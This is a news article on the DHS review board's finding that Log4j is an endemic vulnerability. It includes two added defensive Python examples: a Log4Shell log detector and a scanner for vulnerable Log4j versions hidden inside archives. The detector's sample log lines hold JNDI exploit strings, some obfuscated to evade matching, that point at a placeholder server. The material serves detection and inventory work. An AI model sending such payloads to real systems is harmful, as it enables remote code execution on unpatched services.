DHS Review Board Deems Log4j an 'Endemic' Cyber Threat
Vulnerability will remain a “significant” threat for years to come and highlights the need for more public and private sector support for the open source software ecosystem, Cyber Safety Review Board says.
The US Department of Homeland Security’s Cyber Safety Review Board (CSRB) has concluded that the Apache Log4j vulnerability disclosed in December 2021 will remain a significant risk to organizations for the next decade or longer.
The recently formed board, made up of private industry and government cybersecurity experts, determined that the open source community is not adequately resourced to ensure the security of its code and requires broad assistance from stakeholders across the private and public sectors. In a report published today, the board recommended that federal agencies, as some of the largest consumers of open source code, contribute to open source security and called on the government to consider funding investments to improve the security of the ecosystem.
CSRB released a set of 19 high-level recommendations for organizations to mitigate exposure to Log4j-related attacks and other similar software supply chain risks going forward. The recommendations for organizations include looking for and replacing vulnerable Log4j versions, establishing processes to prevent re-introduction of vulnerable versions into the environment, and maintaining an accurate inventory of IT assets and applications.
An Endemic Vulnerability
The CSRB’s conclusions and recommendations are based on its months-long investigation into the circumstances surrounding the Log4j vulnerability disclosure and the response to it from the open source community, technology vendors, and government and private organizations.
“The Board assesses that Log4j is an ‘endemic vulnerability’ and that vulnerable instances of Log4j will remain in systems for many years to come,” the CSRB said in a report Thursday that summarized its findings.
“Though exploitation of Log4j has been at lower levels than expected and there have been no big Log4j attacks on critical infrastructure targets, the threat is not diminished,” the report noted. “Significant risk remains.”
“The most important aspects of the CSRB report should not surprise anyone who understands the reality of our complex interconnected world,” says Katie Moussouris, founder and CEO of Luta Security and a CSRB member. “We depend on open source technology that isn’t as well-supported from a security standpoint even though we need it to be, to help combat threats,” she says.
The DHS established the CSRB in February 2022 in response to a cybersecurity Executive Order the Biden administration issued in May 2021. The CSRB’s mandate is to bring together security experts from government and private organizations to review and assess significant security events so that improvements can be made at a national level to prevent similar incidents. The Log4j review was the CSRB’s first mission.
Apache Log4j is an open source logging library that is present in almost every Java application environment. In November 2021, a security engineer with China’s e-commerce giant Alibaba reported a vulnerability (CVE-2021-44228) in Log4j to its maintainer, the Apache Software Foundation (ASF). The flaw lay in Log4j’s support for Java Naming and Directory Interface (JNDI) lookups: a specially crafted string in any input that ended up in a log message (a User-Agent header, a username, a chat message) could make the logging library fetch and run code from an attacker-controlled server, giving attackers remote code execution on vulnerable systems. Public disclosure of the vulnerability on Dec. 9, 2021, triggered widespread concern because it was trivial to exploit, ubiquitously present, and had severe consequences.
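The lookup mechanism described above is also what defenders had to hunt for in their logs. The following is an added example, not code from the CSRB report or the Log4j project: it runs a Log4Shell attempt detector over a handful of constructed web-server access-log lines (the 203.0.113.0/24 addresses are a documentation range). Because naive matching on the literal text `${jndi:` misses the nested-lookup and URL-encoding variants that appeared in the wild, the detector first collapses `${lower:…}`, `${upper:…}` and `${…:-default}` lookups to their literal values and undoes URL encoding, and only then looks for a `${jndi:<scheme>:` lookup. The regexes and the sample lines are this example's own assumptions, not patterns taken from the article.

```python
"""Flag CVE-2021-44228 (Log4Shell) exploitation attempts in access logs.
Added example; the normalisation rules and sample lines are constructed here."""
import re
import urllib.parse

# Innermost ${...} with no nested braces inside: resolved bottom-up until stable.
INNER = re.compile(r"\$\{([^{}]*)\}")
# After normalisation a live attempt looks like ${jndi:ldap:...}, ${jndi:rmi:...}, ${jndi:dns:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*[a-z]+\s*:", re.IGNORECASE)


def _resolve(m: "re.Match") -> str:
    """Collapse one innermost lookup to the literal it evaluates to.
    ${lower:J} -> 'j'; ${upper:j} -> 'J'; ${env:NOPE:-j} and ${::-j} -> 'j'.
    Real jndi lookups are left in place so the outer search can see them."""
    body = m.group(1)
    head, _, rest = body.partition(":")
    key = head.strip().lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body and not body.lstrip().lower().startswith("jndi"):
        return body.split(":-", 1)[1]          # default-value syntax yields the default
    return m.group(0)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo (possibly repeated) URL encoding, then flatten nested lookups."""
    for _ in range(3):                          # bounded: double-encoding is common, deeper is rare
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):                 # bounded so a pathological line cannot spin forever
        flattened = INNER.sub(_resolve, text)
        if flattened == text:
            break
        text = flattened
    return text


def find_attempts(lines):
    """Return (line_index, normalised_fragment) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((i, norm[m.start():m.start() + 60]))
    return hits


# Constructed sample log (combined format). Lines 1-4 are attempts; 0 and 5 are benign.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:08:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:08:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:08:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.99/x}"',
    '203.0.113.13 - - [10/Dec/2021:08:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi${env:NOPE:-:}${::-l}dap://203.0.113.99/y}"',
    '203.0.113.14 - - [10/Dec/2021:08:00:05 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.99%3A1099%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.15 - - [10/Dec/2021:08:00:06 +0000] "GET /docs?price=${total:-0} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, fragment in find_attempts(SAMPLE_LOG):
        print(f"line {idx}: {fragment}")
```

The last sample line shows why the normalisation step matters in both directions: a `${…:-default}` expression that is not a JNDI lookup collapses to a harmless literal and is not reported, while the three obfuscated forms all flatten to the same `${jndi:…}` string as the plain attempt. Matching on the normalised text rather than the raw line is what keeps the rule from being trivially bypassed.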
Another major, continuing issue — and one that the CSRB highlighted in its report — is the fact that vulnerable versions of Log4j are often not easily detected because of how deeply embedded the component can be in many environments.
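The recommendations above (find and replace vulnerable Log4j versions, keep an accurate inventory) run into exactly the problem this paragraph describes: log4j-core is often not a file on disk at all but an entry inside a WAR, EAR or fat JAR. The following is an added example, not code from the CSRB report or the Log4j project. It walks a directory tree, opens every archive, recurses into archives nested inside archives, reads the version from the Maven `pom.properties` that Maven-built log4j-core JARs carry, checks for the `JndiLookup.class` entry, and classifies each hit against the fix versions Apache published (2.17.1 for the main line, 2.12.4 and 2.3.2 for the Java 7 and Java 6 lines). The sample tree it scans is constructed in a temporary directory for the demonstration; the archives are stand-ins with only the metadata entries the scanner reads, not real Log4j builds.

```python
"""Inventory Log4j 2 on disk, including copies nested inside WARs / EARs / fat JARs,
and classify each log4j-core by the advisory it still falls under.
Added example; the fixture it scans is constructed, not a real deployment."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# Matched by suffix so shaded/relocated copies (com/x/shaded/.../lookup/JndiLookup.class) are caught.
JNDI_CLASS_SUFFIX = "lookup/JndiLookup.class"
# Standard Maven metadata path inside a Maven-built log4j-core JAR.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str                 # "outer.war!WEB-INF/lib/inner.jar" for nested archives
    version: Optional[str]
    has_jndi_lookup: bool
    status: str


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are dropped:
    every 2.0 beta that shipped JndiLookup is vulnerable regardless."""
    nums = [int(n) for n in re.findall(r"\d+", v.split("-")[0])]
    return tuple(nums + [0] * (3 - len(nums)))[:3]


def classify(version: Optional[str], has_jndi_lookup: bool) -> str:
    """Map a log4j-core version to the Apache advisory it is still exposed to."""
    if version is None:
        return ("unknown-version; JndiLookup.class present, treat as vulnerable"
                if has_jndi_lookup else "unknown-version")
    v = parse_version(version)
    if v[0] != 2:
        return "not-log4j2"                      # 1.x is end-of-life but outside CVE-2021-44228
    if v in ((2, 3, 2), (2, 12, 4)) or v >= (2, 17, 1):
        return "fixed"                           # 2.3.2 / 2.12.4 are the Java 6 / Java 7 fix lines
    if v >= (2, 17, 0):
        return "CVE-2021-44832 (needs config write access), upgrade to 2.17.1"
    if v >= (2, 16, 0):
        return "CVE-2021-45105 (DoS), upgrade to 2.17.1"
    if v >= (2, 15, 0):
        return "CVE-2021-45046, upgrade to 2.17.1"
    if has_jndi_lookup:
        return "CVE-2021-44228 (Log4Shell), upgrade or strip JndiLookup.class"
    return "pre-JNDI 2.x, upgrade"


def scan_archive(data: bytes, label: str, out: List[Finding]) -> None:
    """Inspect one archive held in memory and recurse into any archives it contains."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return                                    # not a zip container; skip it
    names = zf.namelist()
    has_jndi = any(n.endswith(JNDI_CLASS_SUFFIX) for n in names)
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if has_jndi or version is not None:
        out.append(Finding(label, version, has_jndi, classify(version, has_jndi)))
    for n in names:                               # fat JARs, WARs and EARs embed further JARs
        if n.lower().endswith(ARCHIVE_SUFFIXES):
            scan_archive(zf.read(n), f"{label}!{n}", out)


def scan_tree(root: str) -> List[Finding]:
    out: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                p = os.path.join(dirpath, f)
                with open(p, "rb") as fh:
                    scan_archive(fh.read(), p, out)
    return sorted(out, key=lambda x: x.path)


def build_fixture(root: str) -> None:
    """Constructed sample tree: a 2.14.1 core buried inside a WAR and a patched 2.17.1 core
    on its own. Both carry JndiLookup.class, as the real artifacts do, so version decides."""
    def fake_core(version: str) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            z.writestr("org/apache/logging/log4j/core/lookup/JndiLookup.class", b"\xca\xfe\xba\xbe")
        return buf.getvalue()
    os.makedirs(os.path.join(root, "webapps"))
    with zipfile.ZipFile(os.path.join(root, "webapps", "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", fake_core("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(fake_core("2.17.1"))


def demo() -> List[Finding]:
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.status:62} {f.version or '?':8} {f.path}")
```

Two design points matter for real use. First, a file-name search for `log4j-core-*.jar` would never see the copy inside `app.war`, which is why the scanner reads archive entries rather than names. Second, presence of `JndiLookup.class` alone is not a verdict: patched 2.17.x builds still ship the class with JNDI disabled, so the version string must drive the classification, and an archive with the class but no readable version is reported as unknown and left for a human to resolve.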
A Preventable Catastrophe?
The CSRB review showed that an individual member of the open source community submitted the vulnerable JNDI lookup feature for inclusion in Log4j back in 2013. The Log4j team accepted the contribution, and it was later carried into thousands of applications that used Log4j. The Board determined that the vulnerability could have been caught in 2013 if the Log4j team had had someone with security skills to review the code, or had been trained in secure coding practices.
“Unfortunately, the resources to perform such a review were not available to the volunteer developers who led this open-source project in 2013,” the Board said.
Investigators found that the organizations which responded most effectively to the Log4j vulnerability disclosure were also the ones that had effective asset and risk management processes in place and had the resources to mobilize quick action on an enterprisewide scale. But few organizations could mount that kind of response at the speed a vulnerability of this magnitude required, CSRB found. As a result, there was considerable delay both in their assessment of the risk from the vulnerability and in their management of it. Many had to decide whether to upgrade to the fixed version of Log4j that the ASF released, and risk business disruption from potential application breakage, or leave the vulnerability untouched and risk attack.
“The Log4j event highlighted fundamental adoption gaps in vulnerability response practices and overall cybersecurity hygiene,” the report said.
Moussouris says Log4j highlighted the critical need for organizations to know their assets and what versions of software are running on their critical systems. “What might surprise the public is that so few organizations actually have a current list of their critical assets and what software is running on their networks,” she says. “We’re not prepared to respond to the next library incident until that changes.”
One major takeaway from CSRB’s report is the need for more coordinated action around open source security. Often, widely used open source components such as Log4j are maintained by volunteer teams with few resources to spend on security. They typically do not have coordinated vulnerability disclosure processes or response teams to investigate reported vulnerabilities and address them.
“To reduce recurrence of the introduction of vulnerabilities like Log4j, it is essential that public and private sector stakeholders create centralized resourcing and security assistance structures that can support the open-source community going forward,” CSRB said.
Increased Support for Open Source Ecosystem
Eric Brewer, vice president of infrastructure at Google, says the report provides a positive and nuanced view of how organizations need to approach open source use in their environments. “If you are using open source, you can’t expect other people to magically fix security issues for you,” he says. Implicit in the use of open source code is the fact that organizations are consuming the software “as-is.” That means they need to share responsibility for mitigating risk associated with it as well, Brewer says.
He welcomes the CSRB’s call for increased investments around open source security and says what’s also needed are more organizations that can serve as curators for major open source projects. Big companies such as Google could fix vulnerabilities in open source code that they themselves consume and then offer the curated software so others can safely use it. He points to other organizations such as Red Hat and Databricks, which offer curated versions of major open source projects, as other examples.
“Open source software is fundamentally managed differently than commercial software, but open source software plays a key role in the success of commercial software,” says Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Center. Organizations that depend on a commercial vendor to alert them to a problem in an open source component are presuming the vendor is properly managing its usage of open source and is able to identify and alert all users of its impacted software. To mitigate the risk, “software consumers should implement a trust-but-verify model to validate whether the software they’re given doesn’t contain unpatched vulnerabilities,” Mackey says.